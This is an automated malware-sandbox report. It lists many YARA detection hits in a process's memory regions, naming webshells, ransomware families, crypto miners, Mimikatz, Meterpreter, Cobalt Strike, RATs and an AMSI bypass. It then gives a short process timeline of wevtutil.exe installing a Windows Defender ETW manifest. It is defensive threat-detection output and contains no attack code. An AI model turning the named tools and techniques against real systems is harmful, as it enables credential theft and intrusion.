Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_hidden_tear, Description: Yara detected HiddenTear ransomware, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18341014844.00000138BCCD6000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Buran, Description: Yara detected Buran Ransomware, Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Gocoder_3, Description: Yara detected Gocoder ransomware, Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: Joe Security Rule: CVE_2018_4878_0day_ITW, Description: unknown, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: unknown Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Florian Roth Rule: HackTool_Samples, Description: Hacktool, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: unknown Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Joe Security Rule: MirageStrings, Description: Mirage Identifying Strings, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Seth Hardy Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp, Author: Cylance Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, Author: Joe Security Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_EvilGnomeRC5Key, Description: Yara detected Linux EvilGnome RC5 key, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: unknown Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Joe Security Rule: vanquish_2, Description: Webshells Auto-generated - file vanquish.exe, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18319503784.00000138BE66C000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18300587499.00000138BE28E000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18291761539.00000138BCE4E000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18314653568.00000138BCAC3000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, Author: Joe Security Rule: Trojan_Win32_PlaKeylog_B, Description: Keylogger component, Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, Author: Microsoft Rule: DeepPanda_htran_exe, Description: Hack Deep Panda - htran-exe, Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, Author: Joe Security Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cute, Description: Yara detected Cute Ransomware, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18317087585.00000138BCA04000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18320434515.00000138BD905000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Growtopia, Description: Yara detected Growtopia, Source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306077924.00000138BCEEA000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_Samples, Description: Hacktool, Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, Author: unknown Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18432672691.00000138BDF33000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18349361933.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: wevtutil.exe PID: 3364 Parent PID: 3196

General

Start time:	04:45:52
Start date:	12/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man
Imagebase:	0x7ff7e0630000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 5324 Parent PID: 3364

General

Start time:	04:45:53
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: wevtutil.exe PID: 4860 Parent PID: 3196

General

Start time:	04:45:54
Start date:	12/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Imagebase:	0x7ff7e0630000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6548 Parent PID: 4860

General

Start time:	04:45:54
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
